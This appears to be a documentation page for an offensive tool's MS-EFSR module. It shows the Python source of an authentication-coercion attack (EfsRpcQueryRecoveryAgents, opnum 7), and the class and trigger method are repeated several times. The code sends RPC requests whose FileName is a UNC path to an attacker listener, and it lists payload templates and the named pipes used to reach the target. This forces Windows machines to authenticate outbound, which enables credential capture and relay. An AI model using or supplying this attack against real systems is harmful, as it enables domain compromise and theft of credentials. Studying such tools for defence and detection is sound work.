coercer.methods.MS_EFSR.EfsRpcQueryRecoveryAgents
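#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcQueryRecoveryAgents.py
# Author             : Podalirius (@podalirius_)
# Date created       : 16 Sep 2022
#
# Authentication-coercion method for MS-EFSR EfsRpcQueryRecoveryAgents (opnum 7).
# The FileName argument is filled with a UNC path whose host is our listener, so
# the target resolves it and authenticates outbound to us.


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _EfsRpcQueryRecoveryAgents(NDRCALL):
    """
    Request structure for EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    A single [in] argument is marshalled, ``FileName`` (``wchar_t *``). It is the
    field the coercion payload (a UNC path to the listener) is written into.
    """
    opnum = 7
    structure = (
        ('FileName', WSTR),  # Type: wchar_t * -- receives the attacker-chosen UNC path
    )


class _EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
    """
    Response structure for EfsRpcQueryRecoveryAgents() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    The structure is empty: nothing in the reply is needed for coercion, so the
    payload is left undecoded. NOTE(review): the class name presumably has to stay
    ``<request class name>Response`` -- impacket appears to resolve the response
    type by that naming convention; confirm before renaming.
    """
    structure = ()


class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    ``FileName`` is the vulnerable argument: it is set to one of ``exploit_paths``
    (a UNC path whose host is the listener), which the target then resolves,
    producing an outbound authentication to the listener.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Templates for the FileName payload. ``{{listener}}``, ``{{*_listen_port}}`` and
    # ``{{rnd(n)}}`` are placeholders expanded by the framework before the call.
    # Every template ends in an explicit NUL (``\x00``); keep it when adding paths.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Bindings through which the call can be issued. Two interface UUIDs are tried:
    # df1941c5-... on \PIPE\efsrpc, c681d488-... on the lsarpc/samr/lsass/netlogon
    # pipes; both are also listed for direct TCP (ncacn_ip_tcp).
    # NOTE(review): the key is spelled "ncan_np" (not the DCE/RPC protocol-sequence
    # name "ncacn_np"); the framework presumably looks it up by this exact string,
    # so it is kept as-is.
    # NOTE(review): whether a null session is enough to reach these pipes depends on
    # the target's patch level -- confirm during testing rather than assuming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    # Protocol identification shown by the framework (and useful as a detection hint:
    # EFSRPC opnum 7 carrying a UNC FileName that points at an untrusted host).
    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Which argument receives the exploit path.
    function = {
        "name": "EfsRpcQueryRecoveryAgents",
        "opnum": 7,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcQueryRecoveryAgents request carrying ``self.path`` as FileName.

        Args:
            dcerpc_session: a bound DCE/RPC session (``connect()`` must have been
                called first); ``None`` is rejected with an error message.
            target: accepted for interface compatibility; not used by this method.

        Returns:
            ``""`` when the request was sent and a response came back, the caught
            exception object when the call failed, or ``None`` when no session was
            supplied. Note that ``""`` only means the RPC round trip completed; the
            listener is what confirms an authentication actually arrived.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcQueryRecoveryAgents()
            # The coercion vector: the UNC path the target will try to resolve.
            request['FileName'] = self.path
            # Response payload is not needed; only completion of the call matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors (including server-side RPC faults) are handed back rather than
            # raised, presumably so the caller can report them per method/path.
            return err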
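class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)

    ``FileName`` is the vulnerable argument: it is set to one of ``exploit_paths``
    (a UNC path whose host is the listener), which the target then resolves,
    producing an outbound authentication to the listener.

    Method found by:
     - [@topotam77](https://twitter.com/topotam77)
    """

    # Templates for the FileName payload. ``{{listener}}``, ``{{*_listen_port}}`` and
    # ``{{rnd(n)}}`` are placeholders expanded by the framework before the call.
    # Every template ends in an explicit NUL (``\x00``); keep it when adding paths.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # Bindings through which the call can be issued. Two interface UUIDs are tried:
    # df1941c5-... on \PIPE\efsrpc, c681d488-... on the lsarpc/samr/lsass/netlogon
    # pipes; both are also listed for direct TCP (ncacn_ip_tcp).
    # NOTE(review): the key is spelled "ncan_np" (not the DCE/RPC protocol-sequence
    # name "ncacn_np"); the framework presumably looks it up by this exact string,
    # so it is kept as-is.
    # NOTE(review): whether a null session is enough to reach these pipes depends on
    # the target's patch level -- confirm during testing rather than assuming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    # Protocol identification shown by the framework (and useful as a detection hint:
    # EFSRPC opnum 7 carrying a UNC FileName that points at an untrusted host).
    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    # Which argument receives the exploit path.
    function = {
        "name": "EfsRpcQueryRecoveryAgents",
        "opnum": 7,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcQueryRecoveryAgents request carrying ``self.path`` as FileName.

        Args:
            dcerpc_session: a bound DCE/RPC session (``connect()`` must have been
                called first); ``None`` is rejected with an error message.
            target: accepted for interface compatibility; not used by this method.

        Returns:
            ``""`` when the request was sent and a response came back, the caught
            exception object when the call failed, or ``None`` when no session was
            supplied. Note that ``""`` only means the RPC round trip completed; the
            listener is what confirms an authentication actually arrived.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcQueryRecoveryAgents()
            # The coercion vector: the UNC path the target will try to resolve.
            request['FileName'] = self.path
            # Response payload is not needed; only completion of the call matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Errors (including server-side RPC faults) are handed back rather than
            # raised, presumably so the caller can report them per method/path.
            return err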
Coercing a machine to authenticate using function EfsRpcQueryRecoveryAgents (opnum 7) of the MS-EFSR (Encrypting File System Remote) Protocol. The FileName argument is set to a UNC path whose host is the listener; the target resolves it and authenticates outbound to the listener.
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
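def trigger(self, dcerpc_session, target):
    """
    Send one EfsRpcQueryRecoveryAgents request carrying ``self.path`` as FileName.

    Args:
        dcerpc_session: a bound DCE/RPC session (``connect()`` must have been
            called first); ``None`` is rejected with an error message.
        target: accepted for interface compatibility; not used by this method.

    Returns:
        ``""`` when the request was sent and a response came back, the caught
        exception object when the call failed, or ``None`` when no session was
        supplied. ``""`` only means the RPC round trip completed; the listener
        is what confirms an authentication actually arrived.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _EfsRpcQueryRecoveryAgents()
        # The coercion vector: the UNC path the target will try to resolve.
        request['FileName'] = self.path
        # Response payload is not needed; only completion of the call matters.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Errors (including server-side RPC faults) are handed back rather than
        # raised, presumably so the caller can report them per method/path.
        return err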